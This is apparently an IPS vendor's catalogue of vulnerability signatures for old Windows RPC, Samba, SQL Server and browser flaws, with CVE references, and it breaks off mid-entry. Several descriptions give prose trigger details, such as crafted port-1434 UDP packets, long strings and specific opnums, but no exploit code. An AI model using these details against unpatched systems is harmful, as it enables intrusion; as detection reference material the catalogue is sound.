MSRPC-PnP-GetDeviceList-And-GetDeviceListSize-BOF

About this vulnerability: Buffer overflow vulnerability in Plug and Play service GetDeviceList and GetDeviceListSize
Risk: Critical
First detected in: sgpkg-ips-41-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: UPnP
Type: Buffer Overflow
Description: Microsoft Windows Plug and Play service suffers from a buffer overflow vulnerability. Two methods provided by the RPC interface (GetDeviceList and GetDeviceListSize) accept a user-supplied string that is copied into a fixed size buffer without sufficient boundary checking. If the user-supplied string contains a large amount of consecutive backslashes (\), the destination buffer may be overrun. A successful attack allows the remote attacker to execute arbitrary code with SYSTEM privileges on the vulnerable host.
Situation: MSRPC-TCP_CPS-PnP-GetDeviceList-And-GetDeviceListSize-BOF
MSRPC-TCP_CPS-PnP-GetDeviceList-DoS
References:
CVE-2005-2120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2120
BID-15065
http://www.securityfocus.com/bid/15065
OSVDB-18830
http://www.osvdb.org/18830
MS05-047
http://technet.microsoft.com/security/bulletin/MS05-047
Back to top

MSRPC-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in PNP interface
Risk: High
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows Plug and Play service suffers from a buffer overflow vulnerability. The PNP_GetDeviceList function can be exploited by specifying a large output buffer size to cause a denial of service. There is also an alternate attack vector for the same vulnerability via a function call in the SRVSVC interface.
Situation: MSRPC-TCP_CPS-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service
MSRPC-TCP_CPS-PnP-Denial-Of-Service-Via-SRVSVC-NetrDfsCreateExitPoint
References:
CVE-2005-3644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3644
BID-15460
http://www.securityfocus.com/bid/15460
Back to top

MSRPC-Rpcss-RemoteCreateInstance-Race-DoS

About this vulnerability: Multi-threaded race condition in processing incoming RPC requests.
Risk: Critical
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A multi-threaded race condition in the processing of incoming RPC requests in various Windows operating systems may allow remote attackers to trigger a denial of service condition or execute arbitrary code on a vulnerable host. The race condition occurs when two threads process the same request, which leads to memory corruption.
Situation: MSRPC-TCP_CPS-Rpcss-RemoteCreateInstance-Race-DoS
References:
CVE-2003-0813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813
BID-8811
http://www.securityfocus.com/bid/8811
MS04-012
http://technet.microsoft.com/security/bulletin/MS04-012
Back to top

MSRPC-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Samba LSA interface
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Buffer Overflow
Description: Certain versions of Samba suffer from a vulnerability in the Local Security Authority (LSA) component. A specially crafted LsarAddPrivilegesToAccount request to the LSA interface can cause a buffer overflow, allowing remote attackers to execute arbitrary code. Authentication is required to access the interface.
Situation: MSRPC-TCP_CPS-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-23973
http://www.securityfocus.com/bid/23973
OSVDB-34732
http://www.osvdb.org/34732
Back to top

MSRPC-Samba-LSA-LsarLookupSids-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Samba LSA interface
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Samba
Type: Buffer Overflow
Description: Certain versions of Samba suffer from a vulnerability in the Local Security Authority (LSA) component. A specially crafted LsarLookupSids request to the LSA interface can cause a buffer overflow, allowing remote attackers to execute arbitrary code. Authentication is required to access the interface.
Situation: MSRPC-TCP_CPS-Samba-LSA-LsarLookupSids-Buffer-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-23973
http://www.securityfocus.com/bid/23973
OSVDB-34732
http://www.osvdb.org/34732
Back to top

MSRPC-Small-Fragments-Used

About this vulnerability: MSRPC traffic fragmented into small packets detected
Risk: Moderate
First detected in: sgpkg-ips-96-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: The MSRPC protocol allows payload fragmentation. The usage of small fragments is unusual, and can be used by attackers to disguise exploits and evade detection.
Situation: Generic_UDP-MSRPC-Small-Fragments-Used
MSRPC-TCP_Small-Fragments-Used
Generic_CS-MSRPC-Small-Fragments-Used
Back to top

MSRPC-Windows-Local-Security-Authority-Username-Disclosure

About this vulnerability: Windows LSA MSRPC service can be used to obtain valid usernames from a host
Risk: Low
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: Microsoft Windows LSA MSRPC service can be used to obtain a list of valid usernames for a host. The service should not be accessible without authentication to all users, as a list of valid usernames can be used in subsequent attacks, for example in bruteforcing account passwords.
Situation: MSRPC-TCP_CPS-Windows-Local-Security-Authority-Username-Disclosure
Back to top

MSRPC-Workstation-Service-Account-Name-Buffer-Overflow

About this vulnerability: MSRPC Workstation Service Account Name Buffer Overflow detected
Risk: Moderate
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP
Software: <os>
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in the Microsoft Windows Workstation service. The vulnerability is caused by the incorrect processing of long arguments in specially crafted RPC calls. A remote attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, which is normally System.
References:
CVE-2006-4691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4691
BID-20985
http://www.securityfocus.com/bid/20985
MS06-070
http://technet.microsoft.com/security/bulletin/MS06-070
Back to top

MSRPC-Workstation-Service-Buffer-Overflow-MS06-070

About this vulnerability: MSRPC Workstation Service Buffer Overflow MS06-070
Risk: High
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP
Software: <os>
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in the Microsoft Windows Workstation service. The vulnerability is caused by the incorrect processing of long arguments in specially crafted RPC calls. A remote attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, which is normally System.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070-2
MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070
References:
CVE-2006-4691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4691
BID-20985
http://www.securityfocus.com/bid/20985
MS06-070
http://technet.microsoft.com/security/bulletin/MS06-070
Back to top

MSRPC_CA-Arcserve-Backup-Db-Engine-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Computer Associates BrightStor ARCserve Backup DB Engine
Risk: Moderate
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup DB Engine. The vulnerability is due to insufficient memory initialization and is exploitable by sending a crafted message to the vulnerable server. No authentication is required to exploit this vulnerability.
Situation: MSRPC-TCP_CPS-CA-Arcserve-Backup-Db-Engine-Denial-Of-Service
References:
CVE-2008-4399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4399
BID-31684
http://www.securityfocus.com/bid/31684
Back to top

MSRPC_CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine service
Risk: Moderate
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine service. The vulnerability is due to insufficient input validation in the ClientCreateJobHandle library function and can be exploited by sending a crafted DCE-RPC request to the vulnerable server. No authentication is required to exploit this vulnerability.
Situation: MSRPC-TCP_CPS-CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service
References:
CVE-2008-4398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4398
BID-31684
http://www.securityfocus.com/bid/31684
Back to top

MSRPC_CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in CA BrightStor Backup Message Engine MSRPC interface
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: The MSRPC interface for Message Engine in Computer Associates BrightStor suffers from a stack based buffer overflow vulnerability. A crafted request with opnum 0x10d containing a long string can be used by remote attackers to execute arbitrary code on a vulnerable server. No authentication is required to exploit this vulnerability.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow
References:
CVE-2007-5327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5327
BID-26015
http://www.securityfocus.com/bid/26015
Back to top

MSRPC_CA-BrightStor-Backup-Tape-Engine-Message-Vsprintf-Log-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in CA BrightStor Backup Tape Engine interface
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: The MSRPC interface for Tape Engine in Computer Associates BrightStor contains a vulnerable function with opnum 38. A crafted request to the affected function containing a crafted long string will be passed to the vsprintf function without sufficient boundary checks, resulting in a buffer overflow. Remote attackers can exploit the vulnerability with a crafted MSRPC request to execute arbitrary code with SYSTEM privileges on a vulnerable host.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Vsprintf-Log-Buffer-Overflow
References:
CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169
BID-22006
http://www.securityfocus.com/bid/22006
BID-22005
http://www.securityfocus.com/bid/22005
OSVDB-31327
http://www.osvdb.org/31327
Back to top

MSRPC_CA-BrightStor-Backup-Tape-Engine-Opcode-191-Code-Execution-Vulnerability

About this vulnerability: An input validation vulnerability that allows remote code execution in CA BrightStor Tape Engine
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Input Validation
Description: The MSRPC interface for Tape Engine in Computer Associates BrightStor contains a vulnerable function with opnum 191. The function accepts a memory pointer as its argument and treats it as a base pointer for a data structure which contains a function pointer. The function pointer is followed without validating the base address supplied remotely, allowing remote attackers to execute arbitrary code by passing a crafted pointer value. No authentication is required to exploit this vulnerability.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Opcode-191-Function-Access
References:
CVE-2007-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0168
BID-22010
http://www.securityfocus.com/bid/22010
OSVDB-31327
http://www.osvdb.org/31327
Back to top

MSRPC_CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in the Alert Service component used by multiple Computer Associates products
Risk: Moderate
First detected in: sgpkg-ips-152-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Anti-Virus for the Enterprise; Computer Associates Threat Manager for the Enterprise
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Alert Service component used by multiple Computer Associates products. An attacker with valid credentials can send a malicious RPC request with an excessively long Conformant string to cause a denial of service terminating the Computer Associates Alert Notification Server or execute arbitrary code with System privileges on the target host.
Situation: MSRPC-TCP_CPS-CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow
References:
CVE-2007-4620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4620
BID-28605
http://www.securityfocus.com/bid/28605
OSVDB-44040
http://www.osvdb.org/44040
Back to top

MSSQL-MS-SQL-Server-Pre-Authentication-BOF

About this vulnerability: Buffer overflow in the authentication function for Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000
Software: Microsoft SQL Server 2000
Type: Buffer Overflow
Description: It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.
Situation: MSSQL_MS-SQL-Server-Pre-Authentication-BOF
MSSQL_MS-SQL-Server-Pre-Authentication-BOF-2
Shared_MS-SQL-Server-Pre-Authentication-Buffer-Overflow
References:
CVE-2002-1123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1123
BID-5411
http://www.securityfocus.com/bid/5411
MS02-056
http://technet.microsoft.com/security/bulletin/MS02-056
Back to top

MSSQL-MS-SQL-Server-Sp_replwritetovarbin-BOF

About this vulnerability: Buffer overflow in the sp_replwritetovarbin function for Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2000; Microsoft SQL Server 2005
Type: Buffer Overflow
Description: There exists a buffer overflow in Microsoft SQL Server. The vulnerability is due uninitialized variables as parameters when calling the extended stored procedure sp_replwritetovarbin. A remote authenticated attacker can exploit this vulnerability by sending a specially T-SQL script to the target server, potentially causing arbitrary code injection and execution with the privileges of the affected process. In an attack case where code injection is not successful, the SQL Server process will terminate. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SQL server process.
Situation: SMB-TCP_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow
MSSQL_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow
References:
CVE-2008-5416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416
BID-32710
http://www.securityfocus.com/bid/32710
OSVDB-50917
http://www.osvdb.org/50917
MS09-004
http://technet.microsoft.com/security/bulletin/MS09-004
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Displayparamstmt-BOF

About this vulnerability: Buffer overflow using procedure xp_displayparamstmt in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_displayparamstmt) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1081
BID-2030
http://www.securityfocus.com/bid/2030
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Enumresultset-BOF

About this vulnerability: Buffer overflow using xp_enumresultset procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_enumresultset) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1082
BID-2031
http://www.securityfocus.com/bid/2031
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Peekqueue-BOF

About this vulnerability: Buffer overflow using xp_peekqueue procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_peekqueue) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1085
BID-2040
http://www.securityfocus.com/bid/2040
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Printstatements-BOF

About this vulnerability: Buffer overflow using xp_printstatements procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_printstatements) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1086
BID-2041
http://www.securityfocus.com/bid/2041
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Proxiedmetadata-BOF

About this vulnerability: Buffer overflow using xp_proxiedmetadata procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_proxiedmetadata) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1087
BID-2042
http://www.securityfocus.com/bid/2042
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-SetSQLSecurity-BOF

About this vulnerability: Buffer overflow using xp_SetSQLSecurity procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_SetSQLSecurity) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1088
BID-2043
http://www.securityfocus.com/bid/2043
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Showcolv-BOF

About this vulnerability: Buffer overflow using xp_showcolv procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_showcolv) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1083
BID-2038
http://www.securityfocus.com/bid/2038
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-NetBIOS-MS-SQL-Server-Xp-Updatecolvbm-BOF

About this vulnerability: Buffer overflow using xp_updatecolvbm procedure in Microsoft SQL Server (MS00-092)
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 7.0; Microsoft SQL Server 2000
Type: Buffer Overflow
Description: Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_updatecolvbm) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.
Situation: MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF
MSSQL_MS-SQL-Server-XPs-Srv-Paraminfo-BOF
References:
CVE-2000-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1084
BID-2039
http://www.securityfocus.com/bid/2039
MS00-092
http://technet.microsoft.com/security/bulletin/MS00-092
Back to top

MSSQL-Resolution-Service-Stack-Overflow

About this vulnerability: Stack overflow vulnerability in Microsoft's SQL Server Resolution Service
Risk: High
First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2000
Type: Malfunction
Description: Microsoft SQL Server Resolution Service is not properly sanitizing remote user input. If an attacker sends a specially crafted request (first byte set to 0x04 followed by a large string), he may be able to execute arbitrary code with the privileges of the SQL server.
Situation: MSSQL_MS-SQL-Server-Resolution-Service-Stack-Overflow
MSSQL_MS-SQL-Slammer-Worm-Propagation-Attempt
References:
CVE-2002-0649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649
BID-5311
http://www.securityfocus.com/bid/5311
OSVDB-4578
http://www.osvdb.org/4578
MS02-039
http://technet.microsoft.com/security/bulletin/MS02-039
Back to top

MSSQL-Server-2000-0x08-BOF

About this vulnerability: Microsoft SQL Server 2000 heap based overflow vulnerability
Risk: Low
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2000
Type: Buffer Overflow
Description: The Microsoft SQL Server 2000 has a buffer overflow vulnerability exploitable by sending an UDP packet to port 1434. Remote attackers can either overwrite four bytes of memory or cause an access violation in the SQL server process by sending an UDP packet that begins with 0x08 followed by a long string. The access violation occurs if the submitted string does not end with a colon character (:) and a number.
Situation: MSSQL_Server-2000-0x08-DoS
References:
CVE-2002-0729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729
Back to top

MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the CONVERT function in Microsoft SQL Server
Risk: Moderate
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the CONVERT function in Microsoft SQL Server. By sending an SQL statement with a crafted parameter passed to the CONVERT function, a remote authenticated attacker can cause a denial of service terminating the SQL server process or execute arbitarary code with the privileges of the affected process.
Situation: MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow
References:
CVE-2008-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086
OSVDB-46772
http://www.osvdb.org/46772
MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040
Back to top

MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of INSERT statements in Microsoft SQL Server
Risk: Moderate
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2005
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of INSERT statements in Microsoft SQL Server. By sending a crafted SQL statement to the vulnerable server, a remote authenticated attacker can cause a denial of service terminating the SQL server process or execute arbitarary code with the privileges of the affected process.
Situation: MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow
References:
CVE-2008-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106
OSVDB-46770
http://www.osvdb.org/46770
MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040
Back to top

MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability

About this vulnerability: A vulnerability in Microsoft SQL Server
Risk: Moderate
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Malfunction
Description: There exists a vulnerability in the way Microsoft SQL Server 7.0 handles TDS messages. A series of specially crafted TDS messages can cause stack space exhaustion on a vulnerable server. This vulnerability can be leveraged by a remote attack to cause a denial of service condition.
Situation: MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability
References:
CVE-2004-1560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1560
BID-11265
http://www.securityfocus.com/bid/11265
Back to top

MSWebDVD-Class-Null-Pointer-Assignment

About this vulnerability: A vulnerability in DirectX
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: DirectX
Type: Null Pointer Dereference
Description: Under certain conditions the MSWebDVD library dereferences a null pointer. This library is included with all versions of Windows XP. The vulnerability is exposed when a specially crafted VBScript or Javascript program is executed, causing the abnormal termination of the process executing the program.
Situation: File-Text_MSWebDVD-Class-Null-Pointer-Assignment
Back to top

Mujahideen-Secrets-Key-File

About this vulnerability: A Moujahedeen Secrets key file was detected
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mujahedeen Secrets
Type: Insecure Configuration
Description: A Moujahedeen Secrets key file was detected
Situation: File-Text_Mujahideen-Secrets-Key-File
Back to top

Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass

About this vulnerability: Multiple AV Vendor Invalid Archive Checksum Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Generic Antivirus
Type: Malfunction
Description: A vulnerability in multiple antivirus products that allow potentially malformed ZIP files to bypass detection, due to invalid CRC checksum vlaue causing the antivirus to skip scanning of the archive.
Situation: HTTP_CSU-Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass
References:
BID-12771
http://www.securityfocus.com/bid/12771
Back to top

Multiple-Browser-Long-Unicode-DoS-Memory-Corruption

About this vulnerability: Multiple Browser Long Unicode DoS Memory Corruption Vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Generic browser
Type: Buffer Overflow
Description: A vulnerability exists in multiple browsers, Windows, which allows remote attackers to cause a denial of service condition by improperly renderring overly-sized unicode strings.
Situation: File-Text_Multiple-Browser-Long-Unicode-DoS-Memory-Corruption
Back to top

Multiple-Browser-Marquee-DoS-Memory-Corruption

About this vulnerability: Multiple Browser Marquee DoS Memory Corruption Vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Generic browser
Type: Buffer Overflow
Description: A vulnerability exists in multiple browsers, Windows, which allows remote attackers to cause a denial of service condition by overflowing marquee tags.
Situation: File-Text_Multiple-Browser-Marquee-DoS-Memory-Corruption
References:
CVE-2006-2723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2723
BID-18165
http://www.securityfocus.com/bid/18165
Back to top

Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: Low
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There is a malformed URI vulnerability that affects various web-browsers. There is insufficient input validation for telnet URI (e.g., telnet://hostname). Namely, the affected products do not validate or filter "-" characters at the beginning of host-names. Telnet software activated by the browsers treat these as command-line options. As such, a malicious attacker may be able to compromise the target machine. Specifically, it may be possible to create or truncate a file on the target system. In a simple exploit case, the vulnerable system creates a file named by telnet's argument. If the file exists on user's file system, it will be overwritten.
Situation: File-Text_Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability
References:
CVE-2004-0411
